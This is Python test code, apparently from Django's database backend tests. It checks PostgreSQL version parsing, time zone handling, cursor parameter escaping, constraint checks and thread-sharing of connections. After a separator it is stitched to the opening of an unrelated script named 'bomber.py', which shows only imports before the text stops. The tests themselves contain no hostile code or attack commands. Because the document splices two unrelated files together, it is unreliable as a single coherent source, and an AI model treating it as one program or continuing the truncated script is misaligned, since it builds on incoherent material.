self.assert_parses("PostgreSQL 9.3.6", 90306)
self.assert_parses("PostgreSQL 9.4beta1", 90400)
self.assert_parses("PostgreSQL 9.3.1 on i386-apple-darwin9.2.2, compiled by GCC i686-apple-darwin9-gcc-4.0.1 (GCC) 4.0.1 (Apple Inc. build 5478)", 90301)
def test_version_detection(self):
"""Test PostgreSQL version detection"""
# Helper mocks
class CursorMock(object):
"Very simple mock of DB-API cursor"
def execute(self, arg):
pass
def fetchone(self):
return ["PostgreSQL 9.3"]
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
pass
class OlderConnectionMock(object):
"Mock of psycopg2 (< 2.0.12) connection"
def cursor(self):
return CursorMock()
# psycopg2 < 2.0.12 code path
conn = OlderConnectionMock()
self.assertEqual(pg_version.get_version(conn), 90300)
def test_connect_and_rollback(self):
"""
PostgreSQL shouldn't roll back SET TIME ZONE, even if the first
transaction is rolled back (#17062).
"""
databases = copy.deepcopy(settings.DATABASES)
new_connections = ConnectionHandler(databases)
new_connection = new_connections[DEFAULT_DB_ALIAS]
try:
# Ensure the database default time zone is different than
# the time zone in new_connection.settings_dict. We can
# get the default time zone by reset & show.
cursor = new_connection.cursor()
cursor.execute("RESET TIMEZONE")
cursor.execute("SHOW TIMEZONE")
db_default_tz = cursor.fetchone()[0]
new_tz = 'Europe/Paris' if db_default_tz == 'UTC' else 'UTC'
new_connection.close()
# Fetch a new connection with the new_tz as default
# time zone, run a query and rollback.
new_connection.settings_dict['TIME_ZONE'] = new_tz
new_connection.set_autocommit(False)
cursor = new_connection.cursor()
new_connection.rollback()
# Now let's see if the rollback rolled back the SET TIME ZONE.
cursor.execute("SHOW TIMEZONE")
tz = cursor.fetchone()[0]
self.assertEqual(new_tz, tz)
finally:
new_connection.close()
def test_connect_non_autocommit(self):
"""
The connection wrapper shouldn't believe that autocommit is enabled
after setting the time zone when AUTOCOMMIT is False (#21452).
"""
databases = copy.deepcopy(settings.DATABASES)
databases[DEFAULT_DB_ALIAS]['AUTOCOMMIT'] = False
new_connections = ConnectionHandler(databases)
new_connection = new_connections[DEFAULT_DB_ALIAS]
try:
# Open a database connection.
new_connection.cursor()
self.assertFalse(new_connection.get_autocommit())
finally:
new_connection.close()
def _select(self, val):
with connection.cursor() as cursor:
cursor.execute("SELECT %s", (val,))
return cursor.fetchone()[0]
def test_select_ascii_array(self):
a = ["awef"]
b = self._select(a)
self.assertEqual(a[0], b[0])
def test_select_unicode_array(self):
a = ["ᄲawef"]
b = self._select(a)
self.assertEqual(a[0], b[0])
def test_lookup_cast(self):
from django.db.backends.postgresql_psycopg2.operations import DatabaseOperations
do = DatabaseOperations(connection=None)
for lookup in ('iexact', 'contains', 'icontains', 'startswith',
'istartswith', 'endswith', 'iendswith', 'regex', 'iregex'):
self.assertIn('::text', do.lookup_cast(lookup))
def test_correct_extraction_psycopg2_version(self):
from django.db.backends.postgresql_psycopg2.base import DatabaseWrapper
version_path = 'django.db.backends.postgresql_psycopg2.base.Database.__version__'
with mock.patch(version_path, '2.6.9'):
self.assertEqual(DatabaseWrapper.psycopg2_version.__get__(self), (2, 6, 9))
with mock.patch(version_path, '2.5.dev0'):
self.assertEqual(DatabaseWrapper.psycopg2_version.__get__(self), (2, 5))
class DateQuotingTest(TestCase):
def test_django_date_trunc(self):
"""
Test the custom ``django_date_trunc method``, in particular against
fields which clash with strings passed to it (e.g. 'year') - see
#12818__.
__: http://code.djangoproject.com/ticket/12818
"""
updated = datetime.datetime(2010, 2, 20)
models.SchoolClass.objects.create(year=2009, last_updated=updated)
years = models.SchoolClass.objects.dates('last_updated', 'year')
self.assertEqual(list(years), [datetime.date(2010, 1, 1)])
def test_django_date_extract(self):
"""
Test the custom ``django_date_extract method``, in particular against fields
which clash with strings passed to it (e.g. 'day') - see #12818__.
__: http://code.djangoproject.com/ticket/12818
"""
updated = datetime.datetime(2010, 2, 20)
models.SchoolClass.objects.create(year=2009, last_updated=updated)
classes = models.SchoolClass.objects.filter(last_updated__day=20)
self.assertEqual(len(classes), 1)
@override_settings(DEBUG=True)
class LastExecutedQueryTest(TestCase):
def test_last_executed_query(self):
"""
last_executed_query should not raise an exception even if no previous
query has been run.
"""
cursor = connection.cursor()
try:
connection.ops.last_executed_query(cursor, '', ())
except Exception:
self.fail("'last_executed_query' should not raise an exception.")
def test_debug_sql(self):
list(models.Reporter.objects.filter(first_name="test"))
sql = connection.queries[-1]['sql'].lower()
self.assertIn("select", sql)
self.assertIn(models.Reporter._meta.db_table, sql)
def test_query_encoding(self):
"""
Test that last_executed_query() returns an Unicode string
"""
data = models.RawData.objects.filter(raw_data=b'\x00\x46 \xFE').extra(select={'föö': 1})
sql, params = data.query.sql_with_params()
cursor = data.query.get_compiler('default').execute_sql(CURSOR)
last_sql = cursor.db.ops.last_executed_query(cursor, sql, params)
self.assertIsInstance(last_sql, six.text_type)
@unittest.skipUnless(connection.vendor == 'sqlite',
"This test is specific to SQLite.")
def test_no_interpolation_on_sqlite(self):
# Regression for #17158
# This shouldn't raise an exception
query = "SELECT strftime('%Y', 'now');"
connection.cursor().execute(query)
self.assertEqual(connection.queries[-1]['sql'],
str_prefix("QUERY = %(_)s\"SELECT strftime('%%Y', 'now');\" - PARAMS = ()"))
class ParameterHandlingTest(TestCase):
def test_bad_parameter_count(self):
"An executemany call with too many/not enough parameters will raise an exception (Refs #12612)"
cursor = connection.cursor()
query = ('INSERT INTO %s (%s, %s) VALUES (%%s, %%s)' % (
connection.introspection.table_name_converter('backends_square'),
connection.ops.quote_name('root'),
connection.ops.quote_name('square')
))
self.assertRaises(Exception, cursor.executemany, query, [(1, 2, 3)])
self.assertRaises(Exception, cursor.executemany, query, [(1,)])
# Unfortunately, the following tests would be a good test to run on all
# backends, but it breaks MySQL hard. Until #13711 is fixed, it can't be run
# everywhere (although it would be an effective test of #13711).
class LongNameTest(TransactionTestCase):
"""Long primary keys and model names can result in a sequence name
that exceeds the database limits, which will result in truncation
on certain databases (e.g., Postgres). The backend needs to use
the correct sequence name in last_insert_id and other places, so
check it is. Refs #8901.
"""
available_apps = ['backends']
def test_sequence_name_length_limits_create(self):
"""Test creation of model with long name and long pk name doesn't error. Ref #8901"""
models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ.objects.create()
def test_sequence_name_length_limits_m2m(self):
"""Test an m2m save of a model with a long name and a long m2m field name doesn't error as on Django >=1.2 this now uses object saves. Ref #8901"""
obj = models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ.objects.create()
rel_obj = models.Person.objects.create(first_name='Django', last_name='Reinhardt')
obj.m2m_also_quite_long_zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz.add(rel_obj)
def test_sequence_name_length_limits_flush(self):
"""Test that sequence resetting as part of a flush with model with long name and long pk name doesn't error. Ref #8901"""
# A full flush is expensive to the full test, so we dig into the
# internals to generate the likely offending SQL and run it manually
# Some convenience aliases
VLM = models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
VLM_m2m = VLM.m2m_also_quite_long_zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz.through
tables = [
VLM._meta.db_table,
VLM_m2m._meta.db_table,
]
sequences = [
{
'column': VLM._meta.pk.column,
'table': VLM._meta.db_table
},
]
cursor = connection.cursor()
for statement in connection.ops.sql_flush(no_style(), tables, sequences):
cursor.execute(statement)
class SequenceResetTest(TestCase):
def test_generic_relation(self):
"Sequence names are correct when resetting generic relations (Ref #13941)"
# Create an object with a manually specified PK
models.Post.objects.create(id=10, name='1st post', text='hello world')
# Reset the sequences for the database
cursor = connection.cursor()
commands = connections[DEFAULT_DB_ALIAS].ops.sequence_reset_sql(no_style(), [models.Post])
for sql in commands:
cursor.execute(sql)
# If we create a new object now, it should have a PK greater
# than the PK we specified manually.
obj = models.Post.objects.create(name='New post', text='goodbye world')
self.assertGreater(obj.pk, 10)
# This test needs to run outside of a transaction, otherwise closing the
# connection would implicitly rollback and cause problems during teardown.
class ConnectionCreatedSignalTest(TransactionTestCase):
available_apps = []
# Unfortunately with sqlite3 the in-memory test database cannot be closed,
# and so it cannot be re-opened during testing.
@skipUnlessDBFeature('test_db_allows_multiple_connections')
def test_signal(self):
data = {}
def receiver(sender, connection, **kwargs):
data["connection"] = connection
connection_created.connect(receiver)
connection.close()
connection.cursor()
self.assertIs(data["connection"].connection, connection.connection)
connection_created.disconnect(receiver)
data.clear()
connection.cursor()
self.assertEqual(data, {})
class EscapingChecks(TestCase):
"""
All tests in this test case are also run with settings.DEBUG=True in
EscapingChecksDebug test case, to also test CursorDebugWrapper.
"""
bare_select_suffix = connection.features.bare_select_suffix
def test_paramless_no_escaping(self):
cursor = connection.cursor()
cursor.execute("SELECT '%s'" + self.bare_select_suffix)
self.assertEqual(cursor.fetchall()[0][0], '%s')
def test_parameter_escaping(self):
cursor = connection.cursor()
cursor.execute("SELECT '%%', %s" + self.bare_select_suffix, ('%d',))
self.assertEqual(cursor.fetchall()[0], ('%', '%d'))
@unittest.skipUnless(connection.vendor == 'sqlite',
"This is an sqlite-specific issue")
def test_sqlite_parameter_escaping(self):
#13648: '%s' escaping support for sqlite3
cursor = connection.cursor()
cursor.execute("select strftime('%s', date('now'))")
response = cursor.fetchall()[0][0]
# response should be an non-zero integer
self.assertTrue(int(response))
@override_settings(DEBUG=True)
class EscapingChecksDebug(EscapingChecks):
pass
class BackendTestCase(TransactionTestCase):
available_apps = ['backends']
def create_squares_with_executemany(self, args):
self.create_squares(args, 'format', True)
def create_squares(self, args, paramstyle, multiple):
cursor = connection.cursor()
opts = models.Square._meta
tbl = connection.introspection.table_name_converter(opts.db_table)
f1 = connection.ops.quote_name(opts.get_field('root').column)
f2 = connection.ops.quote_name(opts.get_field('square').column)
if paramstyle == 'format':
query = 'INSERT INTO %s (%s, %s) VALUES (%%s, %%s)' % (tbl, f1, f2)
elif paramstyle == 'pyformat':
query = 'INSERT INTO %s (%s, %s) VALUES (%%(root)s, %%(square)s)' % (tbl, f1, f2)
else:
raise ValueError("unsupported paramstyle in test")
if multiple:
cursor.executemany(query, args)
else:
cursor.execute(query, args)
def test_cursor_executemany(self):
#4896: Test cursor.executemany
args = [(i, i ** 2) for i in range(-5, 6)]
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 11)
for i in range(-5, 6):
square = models.Square.objects.get(root=i)
self.assertEqual(square.square, i ** 2)
def test_cursor_executemany_with_empty_params_list(self):
#4765: executemany with params=[] does nothing
args = []
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 0)
def test_cursor_executemany_with_iterator(self):
#10320: executemany accepts iterators
args = iter((i, i ** 2) for i in range(-3, 2))
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 5)
args = iter((i, i ** 2) for i in range(3, 7))
with override_settings(DEBUG=True):
# same test for DebugCursorWrapper
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 9)
@skipUnlessDBFeature('supports_paramstyle_pyformat')
def test_cursor_execute_with_pyformat(self):
#10070: Support pyformat style passing of parameters
args = {'root': 3, 'square': 9}
self.create_squares(args, 'pyformat', multiple=False)
self.assertEqual(models.Square.objects.count(), 1)
@skipUnlessDBFeature('supports_paramstyle_pyformat')
def test_cursor_executemany_with_pyformat(self):
#10070: Support pyformat style passing of parameters
args = [{'root': i, 'square': i ** 2} for i in range(-5, 6)]
self.create_squares(args, 'pyformat', multiple=True)
self.assertEqual(models.Square.objects.count(), 11)
for i in range(-5, 6):
square = models.Square.objects.get(root=i)
self.assertEqual(square.square, i ** 2)
@skipUnlessDBFeature('supports_paramstyle_pyformat')
def test_cursor_executemany_with_pyformat_iterator(self):
args = iter({'root': i, 'square': i ** 2} for i in range(-3, 2))
self.create_squares(args, 'pyformat', multiple=True)
self.assertEqual(models.Square.objects.count(), 5)
args = iter({'root': i, 'square': i ** 2} for i in range(3, 7))
with override_settings(DEBUG=True):
# same test for DebugCursorWrapper
self.create_squares(args, 'pyformat', multiple=True)
self.assertEqual(models.Square.objects.count(), 9)
def test_unicode_fetches(self):
#6254: fetchone, fetchmany, fetchall return strings as unicode objects
qn = connection.ops.quote_name
models.Person(first_name="John", last_name="Doe").save()
models.Person(first_name="Jane", last_name="Doe").save()
models.Person(first_name="Mary", last_name="Agnelline").save()
models.Person(first_name="Peter", last_name="Parker").save()
models.Person(first_name="Clark", last_name="Kent").save()
opts2 = models.Person._meta
f3, f4 = opts2.get_field('first_name'), opts2.get_field('last_name')
query2 = ('SELECT %s, %s FROM %s ORDER BY %s'
% (qn(f3.column), qn(f4.column), connection.introspection.table_name_converter(opts2.db_table),
qn(f3.column)))
cursor = connection.cursor()
cursor.execute(query2)
self.assertEqual(cursor.fetchone(), ('Clark', 'Kent'))
self.assertEqual(list(cursor.fetchmany(2)), [('Jane', 'Doe'), ('John', 'Doe')])
self.assertEqual(list(cursor.fetchall()), [('Mary', 'Agnelline'), ('Peter', 'Parker')])
def test_unicode_password(self):
old_password = connection.settings_dict['PASSWORD']
connection.settings_dict['PASSWORD'] = "françois"
try:
connection.cursor()
except DatabaseError:
# As password is probably wrong, a database exception is expected
pass
except Exception as e:
self.fail("Unexpected error raised with unicode password: %s" % e)
finally:
connection.settings_dict['PASSWORD'] = old_password
def test_database_operations_helper_class(self):
# Ticket #13630
self.assertTrue(hasattr(connection, 'ops'))
self.assertTrue(hasattr(connection.ops, 'connection'))
self.assertEqual(connection, connection.ops.connection)
def test_database_operations_init(self):
"""
Test that DatabaseOperations initialization doesn't query the database.
See #17656.
"""
with self.assertNumQueries(0):
connection.ops.__class__(connection)
def test_cached_db_features(self):
self.assertIn(connection.features.supports_transactions, (True, False))
self.assertIn(connection.features.supports_stddev, (True, False))
self.assertIn(connection.features.can_introspect_foreign_keys, (True, False))
def test_duplicate_table_error(self):
""" Test that creating an existing table returns a DatabaseError """
cursor = connection.cursor()
query = 'CREATE TABLE %s (id INTEGER);' % models.Article._meta.db_table
with self.assertRaises(DatabaseError):
cursor.execute(query)
def test_cursor_contextmanager(self):
"""
Test that cursors can be used as a context manager
"""
with connection.cursor() as cursor:
self.assertIsInstance(cursor, CursorWrapper)
# Both InterfaceError and ProgrammingError seem to be used when
# accessing closed cursor (psycopg2 has InterfaceError, rest seem
# to use ProgrammingError).
with self.assertRaises(connection.features.closed_cursor_error_class):
# cursor should be closed, so no queries should be possible.
cursor.execute("SELECT 1" + connection.features.bare_select_suffix)
@unittest.skipUnless(connection.vendor == 'postgresql',
"Psycopg2 specific cursor.closed attribute needed")
def test_cursor_contextmanager_closing(self):
# There isn't a generic way to test that cursors are closed, but
# psycopg2 offers us a way to check that by closed attribute.
# So, run only on psycopg2 for that reason.
with connection.cursor() as cursor:
self.assertIsInstance(cursor, CursorWrapper)
self.assertTrue(cursor.closed)
# Unfortunately with sqlite3 the in-memory test database cannot be closed.
@skipUnlessDBFeature('test_db_allows_multiple_connections')
def test_is_usable_after_database_disconnects(self):
"""
Test that is_usable() doesn't crash when the database disconnects.
Regression for #21553.
"""
# Open a connection to the database.
with connection.cursor():
pass
# Emulate a connection close by the database.
connection._close()
# Even then is_usable() should not raise an exception.
try:
self.assertFalse(connection.is_usable())
finally:
# Clean up the mess created by connection._close(). Since the
# connection is already closed, this crashes on some backends.
try:
connection.close()
except Exception:
pass
@override_settings(DEBUG=True)
def test_queries(self):
"""
Test the documented API of connection.queries.
"""
with connection.cursor() as cursor:
reset_queries()
cursor.execute("SELECT 1" + connection.features.bare_select_suffix)
self.assertEqual(1, len(connection.queries))
self.assertIsInstance(connection.queries, list)
self.assertIsInstance(connection.queries[0], dict)
six.assertCountEqual(self, connection.queries[0].keys(), ['sql', 'time'])
reset_queries()
self.assertEqual(0, len(connection.queries))
# Unfortunately with sqlite3 the in-memory test database cannot be closed.
@skipUnlessDBFeature('test_db_allows_multiple_connections')
@override_settings(DEBUG=True)
def test_queries_limit(self):
"""
Test that the backend doesn't store an unlimited number of queries.
Regression for #12581.
"""
old_queries_limit = BaseDatabaseWrapper.queries_limit
BaseDatabaseWrapper.queries_limit = 3
new_connections = ConnectionHandler(settings.DATABASES)
new_connection = new_connections[DEFAULT_DB_ALIAS]
# Initialize the connection and clear initialization statements.
with new_connection.cursor():
pass
new_connection.queries_log.clear()
try:
with new_connection.cursor() as cursor:
cursor.execute("SELECT 1" + new_connection.features.bare_select_suffix)
cursor.execute("SELECT 2" + new_connection.features.bare_select_suffix)
with warnings.catch_warnings(record=True) as w:
self.assertEqual(2, len(new_connection.queries))
self.assertEqual(0, len(w))
with new_connection.cursor() as cursor:
cursor.execute("SELECT 3" + new_connection.features.bare_select_suffix)
cursor.execute("SELECT 4" + new_connection.features.bare_select_suffix)
with warnings.catch_warnings(record=True) as w:
self.assertEqual(3, len(new_connection.queries))
self.assertEqual(1, len(w))
self.assertEqual(str(w[0].message), "Limit for query logging "
"exceeded, only the last 3 queries will be returned.")
finally:
BaseDatabaseWrapper.queries_limit = old_queries_limit
new_connection.close()
# We don't make these tests conditional because that means we would need to
# check and differentiate between:
# * MySQL+InnoDB, MySQL+MYISAM (something we currently can't do).
# * if sqlite3 (if/once we get #14204 fixed) has referential integrity turned
# on or not, something that would be controlled by runtime support and user
# preference.
# verify if its type is django.database.db.IntegrityError.
class FkConstraintsTests(TransactionTestCase):
available_apps = ['backends']
def setUp(self):
# Create a Reporter.
self.r = models.Reporter.objects.create(first_name='John', last_name='Smith')
def test_integrity_checks_on_creation(self):
"""
Try to create a model instance that violates a FK constraint. If it
fails it should fail with IntegrityError.
"""
a1 = models.Article(headline="This is a test", pub_date=datetime.datetime(2005, 7, 27), reporter_id=30)
try:
a1.save()
except IntegrityError:
pass
else:
self.skipTest("This backend does not support integrity checks.")
# Now that we know this backend supports integrity checks we make sure
# constraints are also enforced for proxy models. Refs #17519
a2 = models.Article(headline='This is another test', reporter=self.r,
pub_date=datetime.datetime(2012, 8, 3),
reporter_proxy_id=30)
self.assertRaises(IntegrityError, a2.save)
def test_integrity_checks_on_update(self):
"""
Try to update a model instance introducing a FK constraint violation.
If it fails it should fail with IntegrityError.
"""
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrieve it from the DB
a1 = models.Article.objects.get(headline="Test article")
a1.reporter_id = 30
try:
a1.save()
except IntegrityError:
pass
else:
self.skipTest("This backend does not support integrity checks.")
# Now that we know this backend supports integrity checks we make sure
# constraints are also enforced for proxy models. Refs #17519
# Create another article
r_proxy = models.ReporterProxy.objects.get(pk=self.r.pk)
models.Article.objects.create(headline='Another article',
pub_date=datetime.datetime(1988, 5, 15),
reporter=self.r, reporter_proxy=r_proxy)
# Retreive the second article from the DB
a2 = models.Article.objects.get(headline='Another article')
a2.reporter_proxy_id = 30
self.assertRaises(IntegrityError, a2.save)
def test_disable_constraint_checks_manually(self):
"""
When constraint checks are disabled, should be able to write bad data without IntegrityErrors.
"""
with transaction.atomic():
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrieve it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
try:
connection.disable_constraint_checking()
a.save()
connection.enable_constraint_checking()
except IntegrityError:
self.fail("IntegrityError should not have occurred.")
transaction.set_rollback(True)
def test_disable_constraint_checks_context_manager(self):
"""
When constraint checks are disabled (using context manager), should be able to write bad data without IntegrityErrors.
"""
with transaction.atomic():
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrieve it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
try:
with connection.constraint_checks_disabled():
a.save()
except IntegrityError:
self.fail("IntegrityError should not have occurred.")
transaction.set_rollback(True)
def test_check_constraints(self):
"""
Constraint checks should raise an IntegrityError when bad data is in the DB.
"""
with transaction.atomic():
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrieve it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
with connection.constraint_checks_disabled():
a.save()
with self.assertRaises(IntegrityError):
connection.check_constraints()
transaction.set_rollback(True)
class ThreadTests(TransactionTestCase):
available_apps = ['backends']
def test_default_connection_thread_local(self):
"""
Ensure that the default connection (i.e. django.db.connection) is
different for each thread.
Refs #17258.
"""
# Map connections by id because connections with identical aliases
# have the same hash.
connections_dict = {}
connection.cursor()
connections_dict[id(connection)] = connection
def runner():
# Passing django.db.connection between threads doesn't work while
# connections[DEFAULT_DB_ALIAS] does.
from django.db import connections
connection = connections[DEFAULT_DB_ALIAS]
# Allow thread sharing so the connection can be closed by the
# main thread.
connection.allow_thread_sharing = True
connection.cursor()
connections_dict[id(connection)] = connection
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
# Check that each created connection got different inner connection.
self.assertEqual(
len(set(conn.connection for conn in connections_dict.values())),
3)
# Finish by closing the connections opened by the other threads (the
# connection opened in the main thread will automatically be closed on
# teardown).
for conn in connections_dict.values():
if conn is not connection:
conn.close()
def test_connections_thread_local(self):
"""
Ensure that the connections are different for each thread.
Refs #17258.
"""
# Map connections by id because connections with identical aliases
# have the same hash.
connections_dict = {}
for conn in connections.all():
connections_dict[id(conn)] = conn
def runner():
from django.db import connections
for conn in connections.all():
# Allow thread sharing so the connection can be closed by the
# main thread.
conn.allow_thread_sharing = True
connections_dict[id(conn)] = conn
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertEqual(len(connections_dict), 6)
# Finish by closing the connections opened by the other threads (the
# connection opened in the main thread will automatically be closed on
# teardown).
for conn in connections_dict.values():
if conn is not connection:
conn.close()
def test_pass_connection_between_threads(self):
"""
Ensure that a connection can be passed from one thread to the other.
Refs #17258.
"""
models.Person.objects.create(first_name="John", last_name="Doe")
def do_thread():
def runner(main_thread_connection):
from django.db import connections
connections['default'] = main_thread_connection
try:
models.Person.objects.get(first_name="John", last_name="Doe")
except Exception as e:
exceptions.append(e)
t = threading.Thread(target=runner, args=[connections['default']])
t.start()
t.join()
# Without touching allow_thread_sharing, which should be False by default.
exceptions = []
do_thread()
# Forbidden!
self.assertIsInstance(exceptions[0], DatabaseError)
# If explicitly setting allow_thread_sharing to False
connections['default'].allow_thread_sharing = False
exceptions = []
do_thread()
# Forbidden!
self.assertIsInstance(exceptions[0], DatabaseError)
# If explicitly setting allow_thread_sharing to True
connections['default'].allow_thread_sharing = True
exceptions = []
do_thread()
# All good
self.assertEqual(exceptions, [])
def test_closing_non_shared_connections(self):
"""
Ensure that a connection that is not explicitly shareable cannot be
closed by another thread.
Refs #17258.
"""
# First, without explicitly enabling the connection for sharing.
exceptions = set()
def runner1():
def runner2(other_thread_connection):
try:
other_thread_connection.close()
except DatabaseError as e:
exceptions.add(e)
t2 = threading.Thread(target=runner2, args=[connections['default']])
t2.start()
t2.join()
t1 = threading.Thread(target=runner1)
t1.start()
t1.join()
# The exception was raised
self.assertEqual(len(exceptions), 1)
# Then, with explicitly enabling the connection for sharing.
exceptions = set()
def runner1():
def runner2(other_thread_connection):
try:
other_thread_connection.close()
except DatabaseError as e:
exceptions.add(e)
# Enable thread sharing
connections['default'].allow_thread_sharing = True
t2 = threading.Thread(target=runner2, args=[connections['default']])
t2.start()
t2.join()
t1 = threading.Thread(target=runner1)
t1.start()
t1.join()
# No exception was raised
self.assertEqual(len(exceptions), 0)
class MySQLPKZeroTests(TestCase):
"""
Zero as id for AutoField should raise exception in MySQL, because MySQL
does not allow zero for autoincrement primary key.
"""
@skipIfDBFeature('allows_auto_pk_0')
def test_zero_as_autoval(self):
with self.assertRaises(ValueError):
models.Square.objects.create(id=0, root=0, square=1)
class DBConstraintTestCase(TestCase):
def test_can_reference_existent(self):
obj = models.Object.objects.create()
ref = models.ObjectReference.objects.create(obj=obj)
self.assertEqual(ref.obj, obj)
ref = models.ObjectReference.objects.get(obj=obj)
self.assertEqual(ref.obj, obj)
def test_can_reference_non_existent(self):
self.assertFalse(models.Object.objects.filter(id=12345).exists())
ref = models.ObjectReference.objects.create(obj_id=12345)
ref_new = models.ObjectReference.objects.get(obj_id=12345)
self.assertEqual(ref, ref_new)
with self.assertRaises(models.Object.DoesNotExist):
ref.obj
def test_many_to_many(self):
obj = models.Object.objects.create()
obj.related_objects.create()
self.assertEqual(models.Object.objects.count(), 2)
self.assertEqual(obj.related_objects.count(), 1)
intermediary_model = models.Object._meta.get_field("related_objects").rel.through
intermediary_model.objects.create(from_object_id=obj.id, to_object_id=12345)
self.assertEqual(obj.related_objects.count(), 1)
self.assertEqual(intermediary_model.objects.count(), 2)
class BackendUtilTests(TestCase):
def test_format_number(self):
"""
Test the format_number converter utility
"""
def equal(value, max_d, places, result):
self.assertEqual(format_number(Decimal(value), max_d, places), result)
equal('0', 12, 3,
'0.000')
equal('0', 12, 8,
'0.00000000')
equal('1', 12, 9,
'1.000000000')
equal('0.00000000', 12, 8,
'0.00000000')
equal('0.000000004', 12, 8,
'0.00000000')
equal('0.000000008', 12, 8,
'0.00000001')
equal('0.000000000000000000999', 10, 8,
'0.00000000')
equal('0.1234567890', 12, 10,
'0.1234567890')
equal('0.1234567890', 12, 9,
'0.123456789')
equal('0.1234567890', 12, 8,
'0.12345679')
equal('0.1234567890', 12, 5,
'0.12346')
equal('0.1234567890', 12, 3,
'0.123')
equal('0.1234567890', 12, 1,
'0.1')
equal('0.1234567890', 12, 0,
'0')
equal('0.1234567890', None, 0,
'0')
equal('1234567890.1234567890', None, 0,
'1234567890')
equal('1234567890.1234567890', None, 2,
'1234567890.12')
equal('0.1234', 5, None,
'0.1234')
equal('123.12', 5, None,
'123.12')
with self.assertRaises(Rounded):
equal('0.1234567890', 5, None,
'0.12346')
with self.assertRaises(Rounded):
equal('1234567890.1234', 5, None,
'1234600000')
@ignore_warnings(category=UserWarning,
message="Overriding setting DATABASES can lead to unexpected behavior")
class DBTestSettingsRenamedTests(TestCase):
mismatch_msg = ("Connection 'test-deprecation' has mismatched TEST "
"and TEST_* database settings.")
def setUp(self):
super(DBTestSettingsRenamedTests, self).setUp()
self.handler = ConnectionHandler()
self.db_settings = {'default': {}}
def test_mismatched_database_test_settings_1(self):
# if the TEST setting is used, all TEST_* keys must appear in it.
self.db_settings.update({
'test-deprecation': {
'TEST': {},
'TEST_NAME': 'foo',
}
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_mismatched_database_test_settings_2(self):
# if the TEST setting is used, all TEST_* keys must match.
self.db_settings.update({
'test-deprecation': {
'TEST': {'NAME': 'foo'},
'TEST_NAME': 'bar',
},
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_mismatched_database_test_settings_3(self):
# Verifies the mapping of an aliased key.
self.db_settings.update({
'test-deprecation': {
'TEST': {'CREATE_DB': 'foo'},
'TEST_CREATE': 'bar',
},
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_mismatched_database_test_settings_4(self):
# Verifies the mapping of an aliased key when the aliased key is missing.
self.db_settings.update({
'test-deprecation': {
'TEST': {},
'TEST_CREATE': 'bar',
},
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_mismatched_settings_old_none(self):
self.db_settings.update({
'test-deprecation': {
'TEST': {'CREATE_DB': None},
'TEST_CREATE': '',
},
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_mismatched_settings_new_none(self):
self.db_settings.update({
'test-deprecation': {
'TEST': {},
'TEST_CREATE': None,
},
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_matched_test_settings(self):
# should be able to define new settings and the old, if they match
self.db_settings.update({
'test-deprecation': {
'TEST': {'NAME': 'foo'},
'TEST_NAME': 'foo',
},
})
with override_settings(DATABASES=self.db_settings):
self.handler.prepare_test_settings('test-deprecation')
def test_new_settings_only(self):
# should be able to define new settings without the old
self.db_settings.update({
'test-deprecation': {
'TEST': {'NAME': 'foo'},
},
})
with override_settings(DATABASES=self.db_settings):
self.handler.prepare_test_settings('test-deprecation')
@ignore_warnings(category=RemovedInDjango19Warning)
def test_old_settings_only(self):
# should be able to define old settings without the new
self.db_settings.update({
'test-deprecation': {
'TEST_NAME': 'foo',
},
})
with override_settings(DATABASES=self.db_settings):
self.handler.prepare_test_settings('test-deprecation')
def test_empty_settings(self):
with override_settings(DATABASES=self.db_settings):
self.handler.prepare_test_settings('default')
@unittest.skipUnless(connection.vendor == 'sqlite', 'SQLite specific test.')
@skipUnlessDBFeature('can_share_in_memory_db')
class TestSqliteThreadSharing(TransactionTestCase):
available_apps = ['backends']
def test_database_sharing_in_threads(self):
def create_object():
models.Object.objects.create()
create_object()
thread = threading.Thread(target=create_object)
thread.start()
thread.join()
self.assertEqual(models.Object.objects.count(), 2)
|
bomber.py
|
#!/usr/bin/env python
from datetime import datetime
import os
import hashlib
import sys
import time
import threading
import string
import random
import base64
import urllib.request
import urllib.parse
try:
import requests
except ImportError:
print('[!] Error: some dependencies are not installed')
